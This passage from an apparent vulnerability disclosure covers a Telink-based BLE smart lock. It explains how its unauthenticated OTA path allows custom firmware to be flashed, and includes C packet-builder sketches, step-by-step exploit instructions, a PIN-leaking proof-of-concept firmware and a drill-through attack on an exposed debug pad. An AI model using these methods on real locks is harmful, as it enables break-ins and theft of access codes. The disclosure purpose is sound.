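To make the message types and the partition mapping described above more concrete, here is a minimal sketch in C. It is not the decompiled firmware code: all names (ota_classify, ota_flash_address, the OTA_* constants) are hypothetical, and it assumes that the leading 16-bit field of each message is encoded little-endian, which is not stated above.

```c
#include <stddef.h>
#include <stdint.h>

#define OTA_CHUNK_SIZE      0x10u     /* firmware bytes carried by one data message */
#define OTA_EXPECTED_CHUNKS 0x4000u   /* value set by the 0xff01 handler */
#define OTA_PARTITION_SIZE  0x40000u  /* the second partition starts at this offset */

typedef enum {
    OTA_MSG_PREPARE,   /* 0xff00: unimplemented in the analyzed firmware */
    OTA_MSG_BEGIN,     /* 0xff01: begin firmware update */
    OTA_MSG_COMPLETE,  /* 0xff02: complete firmware update */
    OTA_MSG_DATA,      /* anything else: offset + data + CRC */
    OTA_MSG_INVALID    /* too short to carry the 16-bit field */
} ota_msg_type;

/* ASSUMPTION: the leading 16-bit field is little-endian. */
static uint16_t ota_leading_field(const uint8_t *msg)
{
    return (uint16_t)(msg[0] | (msg[1] << 8));
}

/* Decide which of the 4 message types a received write represents. */
static ota_msg_type ota_classify(const uint8_t *msg, size_t len)
{
    if (len < 2)
        return OTA_MSG_INVALID;
    switch (ota_leading_field(msg)) {
    case 0xff00: return OTA_MSG_PREPARE;
    case 0xff01: return OTA_MSG_BEGIN;
    case 0xff02: return OTA_MSG_COMPLETE;
    default:     return OTA_MSG_DATA;
    }
}

/* Map an app-side offset (always starting from 0x0) to an address in the
 * inactive partition. active_partition is 0 when the firmware at 0x0 is
 * running, and 1 when the firmware at 0x40000 is running. */
static uint32_t ota_flash_address(uint32_t offset, int active_partition)
{
    return active_partition == 0 ? OTA_PARTITION_SIZE + offset : offset;
}
```

Note that 0x4000 chunks of 0x10 bytes each cover exactly one 0x40000-byte partition, which is why the two partitions can be swapped without the app knowing which one is in use.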

Ostensibly, the process is well protected, as the 0xff01 message verifies a flag that can only be set by passing the check_admin check properly. However, what happens if we skip this initial message altogether?

Well, there are two main obstacles to pass. The first is the complex logic of handling data. After many unsuccessful attempts to write chunks of data that would satisfy the logical conditions scattered throughout the function body, we realized (rather by accident) that most of these conditions exist to verify that the first 2 chunks (the first 32 bytes) written actually match what’s expected at the start of a firmware image. That’s why our names for some of the variables in the code above may be misleading - they are simply remnants of an attempt to understand the function prior to this discovery. The second obstacle is that the expected chunk count and the processed chunk count are both set by the initial message handler, which we are skipping. However, it seems that those values are either preset by the firmware regardless, or are overwritten after the initial chunks (that contain the expected firmware size) are received.
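
The gap can be illustrated with a deliberately simplified model of the three handlers. This is a sketch of the behavior described in this post, not the firmware's actual code: the structure, its field names and the model_* functions are hypothetical, the checks on the first 2 chunks are omitted, and the model simply assumes the expected chunk count is preset (one of the two possibilities mentioned above).

```c
#include <stdbool.h>
#include <stdint.h>

typedef struct {
    bool     update_requested;   /* set only by the authenticated OTA command */
    uint32_t expected_chunks;    /* ASSUMPTION: preset even without 0xff01 */
    uint32_t chunks_written;     /* number of chunks accepted so far */
    bool     new_image_bootable; /* set when 0xff02 is handled */
} ota_model;

/* 0xff01: the only handler that looks at the authorization flag. */
static bool model_begin(ota_model *m)
{
    if (!m->update_requested)
        return false;
    m->expected_chunks = 0x4000;
    m->chunks_written = 0;
    return true;
}

/* Data message: checks ordering and count, but never the flag. */
static bool model_data(ota_model *m, uint32_t offset)
{
    if (offset != m->chunks_written * 0x10)
        return false;  /* not the chunk that follows the previous one */
    if (m->chunks_written >= m->expected_chunks)
        return false;  /* expected number of chunks already reached */
    m->chunks_written++;
    return true;
}

/* 0xff02: marks the written image as ready to boot, again without the flag. */
static bool model_complete(ota_model *m)
{
    m->new_image_bootable = true;
    return true;
}
```

In this model, a client that never passed check_admin is rejected by model_begin, yet can still call model_data with increasing offsets and then model_complete, which mirrors the behavior we observed on the lock.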

And so, the exploit of this vulnerability becomes as simple as:

  1. Build a firmware for the lock (an SDK is available from Telink).
  2. Connect to the lock over BLE.
  3. Write the firmware to the OTA service/characteristic, in chunks of 0x10 bytes each (preceded by an increasing offset and followed by a CRC).
  4. Write the message 0xff02 to that characteristic.
  5. The lock will restart and boot into the custom firmware - game over!
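
Steps 3 and 4 can be sketched as a pair of packet builders in C. Several details here are assumptions rather than facts taken from this post: the function names are hypothetical, the 16-bit fields are assumed to be little-endian, the CRC is assumed to be 2 bytes long and to cover the offset and the data, and the CRC variant (reflected polynomial 0xA001, initial value 0xFFFF) should be verified against the firmware before relying on it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OTA_CHUNK_SIZE 0x10u

/* ASSUMPTION: CRC-16 with reflected polynomial 0xA001, initial value 0xFFFF. */
static uint16_t ota_crc16(const uint8_t *data, size_t len)
{
    uint16_t crc = 0xFFFF;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc & 1) ? (uint16_t)((crc >> 1) ^ 0xA001)
                            : (uint16_t)(crc >> 1);
    }
    return crc;
}

/* Number of data messages needed for a firmware of fw_size bytes. */
static size_t ota_packet_count(size_t fw_size)
{
    return (fw_size + OTA_CHUNK_SIZE - 1) / OTA_CHUNK_SIZE;
}

/* Build the data message for chunk number `index` into `out` (20 bytes).
 * Layout (assumed): offset (2 bytes) | data (up to 16 bytes) | CRC (2 bytes).
 * Returns the message length, or 0 if the chunk does not exist or its
 * offset does not fit in the 16-bit field. */
static size_t ota_build_data(const uint8_t *fw, size_t fw_size,
                             size_t index, uint8_t out[20])
{
    size_t offset = index * OTA_CHUNK_SIZE;
    if (offset >= fw_size || offset > 0xFFFF)
        return 0;

    size_t n = fw_size - offset;
    if (n > OTA_CHUNK_SIZE)
        n = OTA_CHUNK_SIZE;

    out[0] = (uint8_t)(offset & 0xFF);
    out[1] = (uint8_t)(offset >> 8);
    memcpy(&out[2], fw + offset, n);

    uint16_t crc = ota_crc16(out, 2 + n);
    out[2 + n] = (uint8_t)(crc & 0xFF);
    out[3 + n] = (uint8_t)(crc >> 8);
    return n + 4;
}

/* Build the 0xff02 "complete firmware update" control message. */
static size_t ota_build_complete(uint8_t out[2])
{
    out[0] = 0x02;
    out[1] = 0xFF;
    return 2;
}
```

An attacker's tool would call ota_build_data for indices 0 through ota_packet_count(fw_size) - 1, write each resulting message to the OTA characteristic, and finish with the message produced by ota_build_complete. The BLE write itself is left out, since it depends on the BLE stack in use.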

For proof-of-concept purposes, we developed a firmware that reads the admin’s PIN (not to be confused with adminPs; the PIN is simply a 7-digit code that can be entered on the keypad to open the lock). It then exposes the PIN via beeps (transmitting over BLE is a more robust approach, but requires more coding and doesn’t look as impressive on video), marks itself as invalid and the original firmware as active, and reboots. Thus, it provides the attacker with the means to open the lock at any time, while leaving the lock completely unchanged. We promised lockpicking - but, in our opinion, this is even better! It’s more akin to creating a master key by merely looking at a lock.

We did run into one issue: it’s not possible to push big firmware updates using this method - the limit seems to be around 15-16KB. That’s not a limit on the size itself, however - there seems to be a watchdog that stops the firmware update process, and 15-16KB is simply the size that’s small enough to finish transferring before the watchdog kicks in. The real firmware is quite a bit bigger, but the official update mechanism simply disables the watchdog prior to performing the update. Of course, if there is a real need to upload a bigger firmware, it’s possible to do so by developing a smaller, bootstrap firmware that is only responsible for receiving and writing the real one.

Unprotected debug port

We’d like to finish this post with one last, physical issue. As we mentioned before, the lock contains two TLSR8251 chips, one on each side. Our initial assumption was that the chip located on the apartment side (i.e., accessible from within the apartment) is the one responsible for all the communication and logic, whereas the second chip (located outside) is only responsible for passing along the input from the peripherals located outside (keypad, fingerprint reader, RFID reader). We were shocked to discover that the firmware we analyzed was, in fact, the firmware of the chip located outside! That meant that all of the business, security, and communications logic was running on the chip that was exposed to the outside world, whereas the chip that was more protected was merely responsible for operating the lock motor based on commands from the main chip. But, how detrimental is it to the lock’s security? As it turns out, very.

Remember, an attacker who has access to the debug pin has complete control over the functionality of the lock. The Telink chips require only a single wire for debugging purposes (in addition to ground and voltage, but those can easily be matched with the debugger through the micro-USB port located on the outside part of the lock and intended for emergency power). On top of that, the debug port has a breakout pad (marked on the following image).

Mainboard of the outside-side unit

But what makes this issue really severe is the fact that on the other side of the board is just a piece of plastic with the keypad numbers on it. There is literally no other protection between that debug port and the outside world. Therefore, an attacker who knows the exact location of the breakout pad in relation to the keypad (and that can be easily measured if you have such a lock in your hands) can drill a tiny hole, insert a wire connected to a debugger, and gain complete control over the main MCU of the lock.